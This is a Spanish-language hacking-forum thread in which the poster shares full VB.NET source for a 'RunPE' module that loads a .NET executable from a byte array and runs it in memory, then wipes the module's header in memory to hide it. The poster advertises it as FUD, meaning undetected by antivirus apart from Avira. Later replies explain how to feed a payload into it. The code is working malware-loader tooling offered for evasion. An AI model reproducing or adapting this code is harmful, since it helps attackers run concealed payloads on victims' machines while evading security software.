[SOURCE] RunPE VB.NET

  • 5 Respuestas
  • 2130 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado 79137913

  • *
  • Co Admin
  • Mensajes: 712
  • Actividad:
    10%
  • Country: 00
  • Reputación 7913
  • 4 Esquinas
    • Ver Perfil
    • Doors.Party
    • Email

[SOURCE] RunPE VB.NET

  • en: Febrero 06, 2020, 01:53:11 pm
HOLA!!!

Esta vez no les traigo una tool de hacking en si misma, sino algo mucho mas... peligroso Jajaja.

Esto que veremos aqui es un codigo completo para ubicar en un Modulo de nuestro proyecto de VB.NET con la capacidad de ejecutar en memoria un archivo EXE (o cualquier otro ejecutable con estructura PE) que anteriormente hayamos convertido en un byte array o bien un string que contenga el byte array.

Este codigo aparte de tener el clasico RunPE posee un pequeño snippet que permite convertir un string en un byte array, para los curiosos les recomiendo experimentar con esa funcion.

Ahora nos vamos al codigo:
Código: (vbnet) You are not allowed to view links. Register or Login
'By 79137913 for Underc0de
'Thanks to ANTRAX

Imports System.Reflection
Imports System.Runtime.InteropServices
Imports System.Security
Imports System.Threading

Module PE79137913
    <DllImport("kernel32.dll")>
    Private Sub RtlZeroMemory(ByVal address As IntPtr, ByVal size As Integer)
    End Sub
    <SuppressUnmanagedCodeSecurity>
    Private Delegate Function ExecuteAssembly(ByVal sender As Object, ByVal parameters As Object()) As Object

    'Llama esta funcion para ejecutar tu exe convertido a Byte Array.
    Sub Ejecutar(ByVal buffer As Byte())
        Dim Llave As Integer = BitConverter.ToInt32(buffer, 60)
        buffer(Llave + 920) = CByte(2)
        Dim ParametrosEx As Object() = Nothing
        Dim Ejecutable As Assembly = Thread.GetDomain().Load(buffer)
        Dim PuntoDeEntrada As MethodInfo = Ejecutable.EntryPoint
        If PuntoDeEntrada.GetParameters().Length > 0 Then
            ParametrosEx = New Object() {New String() {Nothing}}
        End If

        Dim HiloDeEjecucion As Thread = New Thread(
            Sub()
                Thread.BeginThreadAffinity()
                Thread.BeginCriticalRegion()
                Dim EjecutarEjecutable As ExecuteAssembly = New ExecuteAssembly(AddressOf PuntoDeEntrada.Invoke)
                EjecutarEjecutable(Nothing, ParametrosEx)
                Thread.EndCriticalRegion()
                Thread.EndThreadAffinity()
            End Sub
            )

        If ParametrosEx IsNot Nothing Then
            If ParametrosEx.Length > 0 Then
                HiloDeEjecucion.SetApartmentState(ApartmentState.MTA)
            Else
                HiloDeEjecucion.SetApartmentState(ApartmentState.STA)
            End If
        End If
        RtlZeroMemory(Marshal.GetHINSTANCE(Ejecutable.ManifestModule), 32)
        HiloDeEjecucion.Start()
    End Sub

    'Usa esta funcion para ejecutar tu exe en forma de String
    Sub Ejecutar(ByVal strBuffer As String)
        Dim Buffer As Byte() = StrToByte(strBuffer)
        Ejecutar(Buffer) 'Ejecuta la cadena de texto convertida a Byte Array
    End Sub

    'Funcion auxiliar para convertir el String en un Byte Array
    Private Function StrToByte(ByVal buffer As String) As Byte()
        Dim ByteBufferEx As Byte() = New Byte(buffer.Length - 1) {}
        For i As Integer = 0 To buffer.Length - 1
            ByteBufferEx(i) = CByte(Val(buffer(i)))
        Next
        Return ByteBufferEx
    End Function
End Module

P.D.: El presente codigo es [FUD] al dia de la fecha, no se cuanto dure, pero por ahora solo lo detecta avira. Disfruten!

GRACIAS POR LEER!!!
« Última modificación: Febrero 17, 2020, 03:44:12 pm por 79137913 »
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                   You are not allowed to view links. Register or Login

Desconectado Solid Water

  • *
  • Underc0der
  • Mensajes: 154
  • Actividad:
    0%
  • Country: 00
  • Reputación 6
  • (:{
    • Ver Perfil

Re:[SOURCE] RunPE VB.NET

  • en: Marzo 12, 2020, 11:24:45 am
Está muy padre no necesitas guardarlo en el disco puedes correrlo directamente en la memoria.

Desconectado 79137913

  • *
  • Co Admin
  • Mensajes: 712
  • Actividad:
    10%
  • Country: 00
  • Reputación 7913
  • 4 Esquinas
    • Ver Perfil
    • Doors.Party
    • Email

Re:[SOURCE] RunPE VB.NET

  • en: Marzo 13, 2020, 08:19:25 am
HOLA!!!

Exacto, esa es la esencia de un RunPE

Para que se entienda Run viene de correr o ejecutar y PE de Portable Executable

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                   You are not allowed to view links. Register or Login

Desconectado Mazza123

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:[SOURCE] RunPE VB.NET

  • en: Octubre 15, 2020, 06:15:38 pm
Hola buenas tardes , como hago para ejecutar ese runpe??, donde tengo que pegar mi opcode??

Desconectado 79137913

  • *
  • Co Admin
  • Mensajes: 712
  • Actividad:
    10%
  • Country: 00
  • Reputación 7913
  • 4 Esquinas
    • Ver Perfil
    • Doors.Party
    • Email

Re:[SOURCE] RunPE VB.NET

  • en: Octubre 19, 2020, 08:59:36 am
HOLA!!!

Si tu opcode esta en texto haces asi:
Ejecutar(StrToByte(TU_OPCODE))

Si tu opcode esta en byte array haces asi:
Ejecutar(TU_OPCODE)

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                   You are not allowed to view links. Register or Login

Desconectado Mazza123

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:[SOURCE] RunPE VB.NET

  • en: Octubre 25, 2020, 04:26:40 pm
 ;D ;D Gracias por ayudarme amigo. me sirvio mucho tu respuesta